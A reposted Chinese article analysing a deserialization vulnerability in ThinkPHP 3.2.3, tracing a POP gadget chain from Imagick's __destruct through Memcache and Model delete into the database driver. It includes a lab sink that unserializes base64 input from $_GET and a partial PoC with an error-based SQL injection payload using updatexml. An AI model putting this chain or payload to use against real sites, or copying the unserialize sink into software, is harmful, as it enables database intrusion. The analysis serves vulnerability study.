iis服务器助手广告广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >Thinkphp3.2.3反序列化漏洞实例代码分析
  • 783
分享到

Thinkphp3.2.3反序列化漏洞实例代码分析

2023-07-05 05:07:15 783人浏览 安东尼
摘要

这篇文章主要介绍“ThinkPHP3.2.3反序列化漏洞实例代码分析”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“Thinkphp3.2.3反序列化漏洞实例代码分析”文章能帮助大家解决问题。魔术方法

这篇文章主要介绍“ThinkPHP3.2.3反序列化漏洞实例代码分析”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“Thinkphp3.2.3反序列化漏洞实例代码分析”文章能帮助大家解决问题。

魔术方法

以下面这个魔术方法为例:

_destruct

该方法的作用是,某个对象的所有引用都被删除或者当对象被显式销毁时执行。例如下面代码:

<?phpclass User{    public function __destruct()    {        echo "xino</br>";    }}$test = new User();$ser = serialize($test);unserialize($ser);?>

执行后会发现调用了魔术方法,我们要想办法来寻找代码之间的关系来构造 反序列化链

复现

这里我是用小皮面板搭建好环境后开始我们的分析,下面是主界面:

Thinkphp3.2.3反序列化漏洞实例代码分析

需要在控制器IndexController.class.php 处写入:

public function index(){    unserialize(base64_decode($_GET[1]));}

首先走到Library/Think/Image/Driver/Imagick.class.php ,代码如下:

 public function __destruct()    {        empty($this->img) || $this->img->destroy();    }}

这里有一个可控的变量img,因为该变量走向了destory(),于是我们寻找一下:

Library/Think/Session/Driver/Memcache.class.php ,该处有个一样的方法:

 public function destroy($sessID)    {        return $this->handle->delete($this->sessionName . $sessID);    }

我们会发现handle和sessionName参数是可控,因为走向了delete函数,于是继续跟进寻找delete,在Mode/Lite/Model.class.php 处:

   public function delete($options = array())    {        $pk = $this->getPk();        if (empty($options) && empty($this->options['where'])) {            // 如果删除条件为空 则删除当前数据对象所对应的记录            if (!empty($this->data) && isset($this->data[$pk])) {                return $this->delete($this->data[$pk]);            } else {                return false;            }        }        if (is_numeric($options) || is_string($options)) {            // 根据主键删除记录            if (strpos($options, ',')) {                $where[$pk] = array('IN', $options);            } else {                $where[$pk] = $options;            }            $options          = array();            $options['where'] = $where;        }        // 根据复合主键删除记录        if (is_array($options) && (count($options) > 0) && is_array($pk)) {            $count = 0;            foreach (array_keys($options) as $key) {                if (is_int($key)) {                    $count++;                }            }            if (count($pk) == $count) {                $i = 0;                foreach ($pk as $field) {                    $where[$field] = $options[$i];                    unset($options[$i++]);                }                $options['where'] = $where;            } else {                return false;            }        }        // 分析表达式        $options = $this->_parseOptions($options);        if (empty($options['where'])) {            // 如果条件为空 不进行删除操作 除非设置 1=1            return false;        }        if (is_array($options['where']) && isset($options['where'][$pk])) {            $pkValue = $options['where'][$pk];        }        if (false === $this->_before_delete($options)) {            return false;        }        $result = $this->db->delete($options);//数据库驱动类中的delete()        if (false !== $result && is_numeric($result)) {            $data = array();            if (isset($pkValue)) {                $data[$pk] = $pkValue;            }            $this->_after_delete($data, $options);        }        // 返回删除记录个数        return $result;    }

这里比较复杂,需要分析一下,pk,pk,pk,data,$options参数都是可控的,第二次调用该函数后是调用db(Library/Think/Db/Driver.class.php )里面的函数,进去看一下:

$table = $this-&gt;parseTable($options['table']);$sql   = 'DELETE FROM ' . $table;return $this-&gt;execute($sql, !empty($options['fetch_sql']) ? true : false);

这里只贴了比较关键的代码,看到table经过parseTable处理之后进了sql语句,跟进了发现没有过滤什么,直接返回了数据,最后调用了execute,我们分析其代码:

 public function execute($str,$fetchSql=false) {        $this->initConnect(true);        if ( !$this->_linkID ) return false;        $this->queryStr = $str;        if(!empty($this->bind)){            $that   =   $this;            $this->queryStr =   strtr($this->queryStr,array_map(function($val) use($that){ return '''.$that->escapeString($val).'''; },$this->bind));        }        if($fetchSql){            return $this->queryStr;        }

看到第二行是一个初始化连接的代码,我们跟进到最后发现:

 public function connect($config = '', $linkNum = 0, $autoConnection = false)    {        if (!isset($this->linkID[$linkNum])) {            if (empty($config)) {                $config = $this->config;            }            try {                if (empty($config['dsn'])) {                    $config['dsn'] = $this->parseDsn($config);                }                if (version_compare(PHP_VERSION, '5.3.6', '<=')) {                    // 禁用模拟预处理语句                    $this->options[PDO::ATTR_EMULATE_PREPARES] = false;                }                $this->linkID[$linkNum] = new PDO($config['dsn'], $config['username'], $config['passWord'], $this->options);            } catch (\PDOException $e) {                if ($autoConnection) {                    trace($e->getMessage(), '', 'ERR');                    return $this->connect($autoConnection, $linkNum);                } elseif ($config['debug']) {                    E($e->getMessage());                }            }        }        return $this->linkID[$linkNum];    }

可以通过里面的相应代码:

$this->config

建立数据库连接,整个的POP链跟进顺序如下:

__destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()->

因为构造poc较长,这里只贴关键处,有兴趣的小伙伴可以自行去构造:

  public function __construct(){            $this->db = new Mysql();            $this->options['where'] = '';            $this->pk = 'id';            $this->data[$this->pk] = array(                "table" => "name where 1=updatexml(1,user(),1)#",                "where" => "1=1"            ); }

生成后传入payload即可实现错报注入,体现在payload里就是table这个语句,经过一串的操作使之与数据库连接来执行sql语句

关于“Thinkphp3.2.3反序列化漏洞实例代码分析”的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识,可以关注编程网PHP编程频道,小编每天都会为大家更新不同的知识点。

--结束END--

本文标题: Thinkphp3.2.3反序列化漏洞实例代码分析

本文链接: https://www.lsjlt.com/news/349927.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • Thinkphp3.2.3反序列化漏洞实例代码分析
    这篇文章主要介绍“Thinkphp3.2.3反序列化漏洞实例代码分析”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“Thinkphp3.2.3反序列化漏洞实例代码分析”文章能帮助大家解决问题。魔术方法...
    99+
    2023-07-05
  • PHP反序列化漏洞实例分析
    本篇内容介绍了“PHP反序列化漏洞实例分析”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!一、PHP面向对象编程在面向对象的程序设计(Obje...
    99+
    2023-06-29
  • thinkphp5.0.24反序列化漏洞分析
    thinkphp5.0.24反序列化漏洞分析 文章目录 thinkphp5.0.24反序列化漏洞分析 具体分析 反序列化起点 toArray ge...
    99+
    2023-09-03
    安全 php web安全 数据库 开发语言
  • TP 5.0.24反序列化漏洞分析
    前言 很久没发过文章了,最近在研究审计链条相关的东西,codeql,ast,以及一些java的东西很多东西还是没学明白就先不写出来丢人了,写这篇tp的原因呢 虽然这个漏洞的分析文章蛮多了,但是还是跟着...
    99+
    2023-08-31
    php 安全 web安全
  • PHP的session反序列化漏洞分析
    这篇文章主要讲解了“PHP的session反序列化漏洞分析”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“PHP的session反序列化漏洞分析”吧!PHP session反序列化漏洞PHP ...
    99+
    2023-06-30
  • 【反序列化漏洞-02】PHP反序列化漏洞实验详解
    为什么要序列化 百度百科上关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式(字符串)的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区(非关系型键值对形式的数据库Redis,与数组类似)。以后,可以通过从存储区中...
    99+
    2023-09-21
    序列化 反序列化 PHP反序列化漏洞 PHP魔术方法 网络安全 Powered by 金山文档
  • PHP 反序列化漏洞
    PHP反序列化漏洞在实际测试中出现的频率并不高,主要常出现在CTF中。 PHP序列化概述 PHP序列化函数: serialize:将PHP的数据,数组,对象等序列化为字符串unserialize:将序列化后的字符串反序列化为数据,数组,对...
    99+
    2023-09-01
    php web安全
  • thinkphp 反序列化漏洞
    文章目录 配置xdebug反序列化漏洞利用链详细分析poc1(任意文件删除)poc2(任意命令执行) 补充代码 配置xdebug php.ini [Xdebug]zend_ext...
    99+
    2023-09-04
    apache php 开发语言 web安全 网络安全
  • 反序列化漏洞(PHP)
    反序列化漏洞 0x01. 序列化和反序列化是什么 序列化:变量转换为可保存或传输的字符串的过程; 反序列化:把序列化的字符串再转化成原来的变量使用 作用:可轻松地存储和传输数据,使程序更...
    99+
    2023-09-03
    php web安全 安全
  • Laravel 9.1.8 反序列化漏洞分析及复现
    反序列化漏洞是如今很常见的漏洞类型,有很多分类,也有很多绕过方式。本文选取了一个今年比较典型的反序列化漏洞,进行了一个分析并复现。 漏洞详情 Laravel是一套简洁、优雅的PHP Web开发框架。 ...
    99+
    2023-10-09
    laravel 安全 web安全
  • PHP反序列化入门代码实例分析
    本文小编为大家详细介绍“PHP反序列化入门代码实例分析”,内容详细,步骤清晰,细节处理妥当,希望这篇“PHP反序列化入门代码实例分析”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧。php反序列化简单理解首先我们需要...
    99+
    2023-07-05
  • 【反序列化漏洞-01】序列化与反序列化概述
    为什么要序列化 百度百科上关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式(字符串)的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区(非关系型键值对形式的数据库Redis,与数组类似)。以后,可以通过从存储区中...
    99+
    2023-09-06
    web安全 安全 反序列化 序列化 PHP反序列化漏洞 Powered by 金山文档
  • 反序列化漏洞详解
    目录 一、什么是序列化和反序列化 二、什么是反序列化漏洞 三、序列化函数(serialize) 四、反序列化(unserialize) ​五、什么是PHP魔术方法 六、一些常见的魔术方法 七、魔术方法的利用  八、反序列化漏洞的利用 1._...
    99+
    2023-09-02
    web安全 安全 php
  • phpmyadmin scripts/setup.php 反序列化漏洞
    文章目录 0x01 影响版本 0x02 漏洞复现 0x03 补充知识点: ...
    99+
    2023-09-03
    php 开发语言 linux
  • 浅谈phar反序列化漏洞
    目录 基础知识 前言 Phar基础 Phar文件结构 受影响的函数 漏洞实验 实验一 实验二 过滤绕过 补充 基础知识 前言 PHP反序列化常见的是使用unserilize()进行反序列化,除此之外还有其它的反序列化方法,不需要用到un...
    99+
    2023-09-09
    web安全 网络安全 php
  • ThinkPHP v6.0.13 存在反序列化漏洞
    漏洞描述 ThinkPHP 是一个免费开源的,轻量级的PHP开发框架。 ThinkPHP 6.0.13版本中存在反序列化漏洞,攻击者可通过精心设计的 payload 在 Psr6Cache 组件中通过...
    99+
    2023-09-02
    apache 安全 php
  • Ezpop pop序列化链反序列化实例分析
    这篇文章主要介绍了Ezpop pop序列化链反序列化实例分析的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇Ezpop pop序列化链反序列化实例分析文章都会有所收获,下面我们一起来看看吧。&...
    99+
    2023-06-30
  • php反序列化漏洞之pop链
    目录 POP链简介 pop面向属性编程: pop chain pop链利用技巧 1、在pop链中出现的方法: 2、反序列化中为了避免信息丢失,可以使用大写S,支持字符串的编码 3、深浅copy 4、利用php伪协议 POP键构造复现: 例...
    99+
    2023-09-29
    安全 web安全
  • Python、PHP和Java下的反序列化漏洞复现实例
    环境准备 这篇文章旨在用于网络安全学习,请勿进行任何非法行为,否则后果自负。  python反序列化 p83 CTF夺旗 Python考点SST&反序列化&字符串_正经人_____的博客-CSDN博客 php反序列化 p84 CTF夺旗-P...
    99+
    2023-09-17
    java 开发语言
  • PHP反序列化漏洞详解(万字分析、由浅入深)
    文章目录 一、PHP面向对象编程public、protected、private魔术方法(magic函数)魔术方法在反序列化攻击中的作用 二、PHP序列化和反序列化PHP序列化PHP反序列...
    99+
    2023-10-27
    php PHP反序列化漏洞 魔术函数 mysql url
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作